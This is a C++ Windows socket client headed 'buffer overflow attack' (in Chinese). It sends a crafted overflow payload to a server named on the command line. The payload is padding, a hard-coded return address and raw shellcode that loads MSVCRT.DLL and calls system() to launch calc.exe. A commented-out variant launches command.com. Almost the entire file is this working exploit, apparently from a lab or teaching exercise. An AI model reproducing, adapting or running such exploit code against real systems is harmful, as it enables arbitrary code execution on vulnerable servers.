client.cpp

缓冲区溢出攻击

#include <stdio.h>
#include <stdlib.h>
#include <WINSOCK2.H>
#pragma comment (lib, "WS2_32")

int main(int argc, char **argv)
{
	WSADATA wsaData;
	if( WSAStartup(0x101, &wsaData) != 0 )
	{
		printf("Failed Initialization.\n");
		return 0;
	}
	
	if(argc!=3)
	{
		printf("Usage: client.exe [Server_IP] [port]\n");
		return 0;
	}

	int port = atoi(argv[2]);

	SOCKET s = ::socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(s == INVALID_SOCKET)
	{
		printf("Failed socket()\n");
		return 0;
	}

	sockaddr_in servAddr;
	servAddr.sin_family = AF_INET;
	servAddr.sin_port = htons(port);

	servAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
	if(::connect(s, (sockaddr *)&servAddr, sizeof(servAddr)) == -1)
	{
		printf("Failed connect()\n");
		return 0;
	}

	char buff[1024];
	int nRev = ::recv(s, buff, sizeof(buff), 0);
	if (nRev > 0)
	{
		buff[nRev] = '\0';
		printf("Received: %s", buff);
	}

	char toSend[] = 
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x12\x45\xfa\x7f"
"\x55\x8b\xec"
"\x33\xc0\x50\x50\x50\xc6\x45\xf4\x4d\xc6\x45\xf5\x53\xc6\x45"
"\xf6\x56\xc6\x45\xf7\x43\xc6\x45\xf8\x52\xc6\x45\xf9\x54\xc6"
"\x45\xfa\x2e\xc6\x45\xfb\x44\xc6\x45\xfc\x4c\xc6"	
"\x45\xfd\x4c\xba"
//"\x9c\x5f\x91\x7c"  //loadlibrarya
"\x9c\x3f\x88\x7c"
"\x52\x8d\x45\xf4\x50\xff\x55\xf0\x55\x8b\xec\x83\xec\x0c\xb8\x63\x61\x6c\x63"
"\x89\x45\xf4\xb8\x2e\x65\x78\x65\x89\x45\xf8\x33\xd2\x88\x55\xfc\x8d\x45\xf4"
"\x50\xb8"
"\xc7\x93\xbf\x77" //system
"\xff\xd0";

/*	"\x41\x41\x41\x41\x41\x41\x41\x41\x12\x45\xfa\x7f\x55\x8b\xec"
"\x33\xc0\x50\x50\x50\xc6\x45\xf4\x4d\xc6\x45\xf5\x53\xc6\x45"
"\xf6\x56\xc6\x45\xf7\x43\xc6\x45\xf8\x52\xc6\x45\xf9\x54\xc6"
"\x45\xfa\x2e\xc6\x45\xfb\x44\xc6\x45\xfc\x4c\xc6\x45\xfd\x4c"
"\xba\x9c\x5f\x91\x7c\x52\x8d\x45\xf4\x50\xff\x55\xf0\x55\x8b"
"\xec\x83\xec\x0c\xb8\x63\x6f\x6d\x6d\x89\x45\xf4\xb8\x61\x6e"
"\x64\x2e\x89\x45\xf8\xb8\x63\x6f\x6d\x22\x89\x45\xfc\x33\xd2"
"\x88\x55\xff\x8d\x45\xf4\x50\xb8\xc7\x93\xbf\x77\xff\xd0";
*/
	/*
	char Test[100]={0};

	printf("please input text!\n");

	char c='a';

	while(c!='#')
	{
		c=getchar();
		send(s, &c, 1, 0);
	}
	*/

	send(s, toSend, strlen(toSend), 0);

	::closesocket(s);
	return 0;
}